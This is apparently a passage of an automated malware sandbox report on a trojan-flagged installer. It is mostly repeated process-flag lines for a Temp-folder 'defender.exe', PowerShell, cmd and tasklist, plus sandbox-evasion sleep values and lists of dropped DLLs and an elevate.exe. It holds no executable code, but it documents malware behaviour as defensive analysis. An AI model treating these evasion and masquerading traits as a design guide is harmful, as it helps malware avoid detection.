Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3902Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2551Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2558Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 403Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 3902 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 2551 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep count: 2558 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780Thread sleep count: 403 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876Thread sleep time: -922337203685477s >= -30000sJump to behavior
